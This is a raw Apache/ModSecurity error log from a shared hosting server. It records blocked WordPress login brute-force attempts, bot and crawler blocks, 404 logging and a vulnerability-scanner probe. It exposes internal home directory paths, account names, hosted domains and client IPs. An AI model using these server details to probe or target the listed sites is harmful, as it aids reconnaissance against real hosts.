[Tue May 26 19:22:54.965191 2026] [security2:error] [pid 37506:tid 37681] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWltgKctTPx5f8aOzkpRQAAAC0"]
[Tue May 26 19:22:55.876069 2026] [security2:error] [pid 37506:tid 37630] [remote 173.236.37.42:47498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.37.236.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWltwKctTPx5f8aOzkpbAAAN3s"]
[Tue May 26 19:22:56.384193 2026] [autoindex:error] [pid 37506:tid 37661] [client 199.45.154.141:55716] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:22:56.387721 2026] [security2:error] [pid 37506:tid 37529] [remote 173.236.37.42:47498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.37.236.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWluAKctTPx5f8aOzkpjAAALRY"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:22:56.514475 2026] [security2:error] [pid 37506:tid 37660] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWluAKctTPx5f8aOzkpfQAAABg"]
[Tue May 26 19:22:56.890812 2026] [security2:error] [pid 37506:tid 37542] [remote 111.229.141.137:56168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWluAKctTPx5f8aOzkplAAAHiM"]
[Tue May 26 19:22:59.318500 2026] [security2:error] [pid 37506:tid 37662] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlugKctTPx5f8aOzkp2gAAABo"]
[Tue May 26 19:23:00.375296 2026] [security2:error] [pid 37506:tid 37680] [client 165.162.90.214:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWluwKctTPx5f8aOzkp_AAAACw"]
[Tue May 26 19:23:01.464245 2026] [security2:error] [pid 37506:tid 37706] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlvQKctTPx5f8aOzkqFAAAAEY"]
[Tue May 26 19:23:03.865351 2026] [security2:error] [pid 37506:tid 37650] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlvwKctTPx5f8aOzkqYQAAAA4"]
[Tue May 26 19:23:04.355218 2026] [security2:error] [pid 37506:tid 37583] [remote 141.95.202.18:50212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWlwAKctTPx5f8aOzkqhAAAMkw"]
[Tue May 26 19:23:05.856830 2026] [security2:error] [pid 37506:tid 37642] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlwQKctTPx5f8aOzkqyQAAAAY"]
[Tue May 26 19:23:07.782464 2026] [security2:error] [pid 37506:tid 37673] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlwwKctTPx5f8aOzkrCQAAACU"]
[Tue May 26 19:23:10.887735 2026] [security2:error] [pid 37506:tid 37692] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlxgKctTPx5f8aOzkrWwAAADg"]
[Tue May 26 19:23:12.638678 2026] [security2:error] [pid 37506:tid 37516] [remote 5.42.158.148:40708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahWlyAKctTPx5f8aOzkrmAAAUAk"]
[Tue May 26 19:23:12.761834 2026] [security2:error] [pid 37506:tid 37647] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlyAKctTPx5f8aOzkrkQAAAAs"]
[Tue May 26 19:23:15.222458 2026] [security2:error] [pid 37506:tid 37660] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlygKctTPx5f8aOzkr3AAAABg"]
[Tue May 26 19:23:17.326699 2026] [security2:error] [pid 37506:tid 37763] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlzAKctTPx5f8aOzksHQAAAH8"]
[Tue May 26 19:23:18.608441 2026] [security2:error] [pid 37506:tid 37550] [remote 202.172.25.51:44370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.25.172.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlzgKctTPx5f8aOzksQwAAIis"]
[Tue May 26 19:23:19.624538 2026] [security2:error] [pid 37506:tid 37749] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlzwKctTPx5f8aOzksXwAAAHE"]
[Tue May 26 19:23:21.198124 2026] [security2:error] [pid 37506:tid 37706] [client 102.164.188.174:2300] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/card.php"] [unique_id "ahWl0AKctTPx5f8aOzksowAARjo"], referer: https://erp.azurmediatec.com/salaries/card.php?id=27
[Tue May 26 19:23:21.743858 2026] [security2:error] [pid 37506:tid 37684] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl0QKctTPx5f8aOzkswQAAADA"]
[Tue May 26 19:23:24.021452 2026] [security2:error] [pid 37506:tid 37752] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl0wKctTPx5f8aOzktAgAAAHQ"]
[Tue May 26 19:23:24.445477 2026] [security2:error] [pid 37506:tid 37738] [client 146.174.185.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl1AKctTPx5f8aOzktEwAAAGY"]
[Tue May 26 19:23:25.766531 2026] [security2:error] [pid 37506:tid 37622] [remote 14.161.17.36:56998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWl1QKctTPx5f8aOzktPAAAZ3M"]
[Tue May 26 19:23:26.480350 2026] [security2:error] [pid 37506:tid 37641] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl1gKctTPx5f8aOzktUwAAAAU"]
[Tue May 26 19:23:26.726339 2026] [security2:error] [pid 37506:tid 37593] [remote 74.7.241.58:58374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWl1gKctTPx5f8aOzktWwAAfFY"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-content/plugins/woocommerce/templates/cart
[Tue May 26 19:23:28.148053 2026] [security2:error] [pid 37506:tid 37695] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl1wKctTPx5f8aOzktcwAAADs"]
[Tue May 26 19:23:28.690592 2026] [security2:error] [pid 37506:tid 37507] [remote 72.167.150.128:35288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWl2AKctTPx5f8aOzkthAAAKAA"]
[Tue May 26 19:23:28.979587 2026] [security2:error] [pid 37506:tid 37513] [remote 72.167.150.128:35288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWl2AKctTPx5f8aOzktjgAAFAY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:23:29.404219 2026] [security2:error] [pid 37506:tid 37518] [remote 82.196.25.136:38326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWl2QKctTPx5f8aOzktlQAAdgs"]
[Tue May 26 19:23:30.371029 2026] [security2:error] [pid 37506:tid 37645] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl2QKctTPx5f8aOzktogAAAAk"]
[Tue May 26 19:23:30.795364 2026] [security2:error] [pid 37506:tid 37517] [remote 123.30.233.13:59802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWl2gKctTPx5f8aOzktrwAARwo"]
[Tue May 26 19:23:31.413234 2026] [security2:error] [pid 37506:tid 37579] [remote 123.30.233.13:59802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWl2wKctTPx5f8aOzktxAAAH0g"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:23:32.257792 2026] [security2:error] [pid 37506:tid 37613] [remote 103.95.119.103:46734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWl3AKctTPx5f8aOzktzAAAQmo"]
[Tue May 26 19:23:32.729693 2026] [security2:error] [pid 37506:tid 37714] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl3AKctTPx5f8aOzkt1QAAAE4"]
[Tue May 26 19:23:35.502745 2026] [security2:error] [pid 37506:tid 37711] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl3wKctTPx5f8aOzkuIgAAAEs"]
[Tue May 26 19:23:35.657412 2026] [security2:error] [pid 37506:tid 37741] [client 74.7.241.132:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mosykay.com"] [uri "/robots.txt"] [unique_id "ahWl3wKctTPx5f8aOzkuLgAAAGk"]
[Tue May 26 19:23:35.658043 2026] [security2:error] [pid 37506:tid 37724] [client 74.7.241.132:40272] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mosykay.com"] [uri "/robots.txt"] [unique_id "ahWl3wKctTPx5f8aOzkuLAAAWHw"]
[Tue May 26 19:23:35.889602 2026] [security2:error] [pid 37506:tid 37529] [remote 123.30.233.13:59808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWl3wKctTPx5f8aOzkuMgAAPBY"]
[Tue May 26 19:23:36.433433 2026] [security2:error] [pid 37506:tid 37633] [remote 123.30.233.13:59808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWl4AKctTPx5f8aOzkuSQAADH4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:23:38.121393 2026] [security2:error] [pid 37506:tid 37670] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl4QKctTPx5f8aOzkubQAAACI"]
[Tue May 26 19:23:39.890301 2026] [security2:error] [pid 37506:tid 37761] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl4wKctTPx5f8aOzkupwAAAH0"]
[Tue May 26 19:23:40.635865 2026] [security2:error] [pid 37506:tid 37742] [client 185.191.171.12:43874] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-18th/day/2025-02-17/"] [unique_id "ahWl5AKctTPx5f8aOzkuuAAAAGo"]
[Tue May 26 19:23:40.636026 2026] [security2:error] [pid 37506:tid 37742] [client 185.191.171.12:43874] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-18th/day/2025-02-17/"] [unique_id "ahWl5AKctTPx5f8aOzkuuAAAAGo"]
[Tue May 26 19:23:41.507037 2026] [security2:error] [pid 37506:tid 37739] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl5QKctTPx5f8aOzkuygAAAGc"]
[Tue May 26 19:23:43.542234 2026] [security2:error] [pid 37506:tid 37566] [remote 123.30.233.13:56116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWl5wKctTPx5f8aOzkvAgAAZjs"]
[Tue May 26 19:23:44.551240 2026] [security2:error] [pid 37506:tid 37756] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl6AKctTPx5f8aOzkvDAAAAHg"]
[Tue May 26 19:23:46.138636 2026] [security2:error] [pid 37506:tid 37575] [remote 123.30.233.13:56132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWl6gKctTPx5f8aOzkvPgAAbUQ"]
[Tue May 26 19:23:46.685683 2026] [security2:error] [pid 37506:tid 37548] [remote 123.30.233.13:56132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWl6gKctTPx5f8aOzkvTwAAMCk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:23:46.788444 2026] [security2:error] [pid 37506:tid 37720] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl6gKctTPx5f8aOzkvSgAAAFQ"]
[Tue May 26 19:23:48.688881 2026] [security2:error] [pid 37506:tid 37744] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl7AKctTPx5f8aOzkvfQAAAGw"]
[Tue May 26 19:23:49.019133 2026] [security2:error] [pid 37506:tid 37736] [client 202.76.172.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl7AKctTPx5f8aOzkviwAAAGQ"]
[Tue May 26 19:23:50.594717 2026] [security2:error] [pid 37506:tid 37685] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl7gKctTPx5f8aOzkvtQAAADE"]
[Tue May 26 19:23:52.367346 2026] [security2:error] [pid 37506:tid 37562] [remote 94.76.235.103:42656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWl8AKctTPx5f8aOzkv7gAAazc"]
[Tue May 26 19:23:53.410366 2026] [security2:error] [pid 37506:tid 37711] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl8AKctTPx5f8aOzkwCAAAAEs"]
[Tue May 26 19:23:54.509072 2026] [security2:error] [pid 37506:tid 37601] [remote 5.45.96.74:40116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.96.45.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWl8gKctTPx5f8aOzkwLgAACl4"]
[Tue May 26 19:23:54.644595 2026] [security2:error] [pid 37506:tid 37569] [remote 94.76.235.103:42656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWl8gKctTPx5f8aOzkwNwAAdz4"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 19:23:55.070639 2026] [security2:error] [pid 37506:tid 37710] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl8gKctTPx5f8aOzkwOwAAAEo"]
[Tue May 26 19:23:55.512871 2026] [core:crit] [pid 37506:tid 37637] (13)Permission denied: [client 157.55.39.10:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:23:58.213749 2026] [security2:error] [pid 37506:tid 37754] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl9QKctTPx5f8aOzkwlwAAAHY"]
[Tue May 26 19:23:59.631651 2026] [security2:error] [pid 37506:tid 37657] [client 47.128.18.135:16228] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.yourstorybag.com"] [uri "/robots.txt"] [unique_id "ahWl9wKctTPx5f8aOzkw2wAAABU"]
[Tue May 26 19:24:00.279146 2026] [security2:error] [pid 37506:tid 37704] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl9wKctTPx5f8aOzkw6AAAAEQ"]
[Tue May 26 19:24:01.609718 2026] [security2:error] [pid 37506:tid 37716] [client 193.37.33.110:55809] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWl-AKctTPx5f8aOzkw9wAAAFA"]
[Tue May 26 19:24:02.596214 2026] [security2:error] [pid 37506:tid 37742] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl-gKctTPx5f8aOzkxOQAAAGo"]
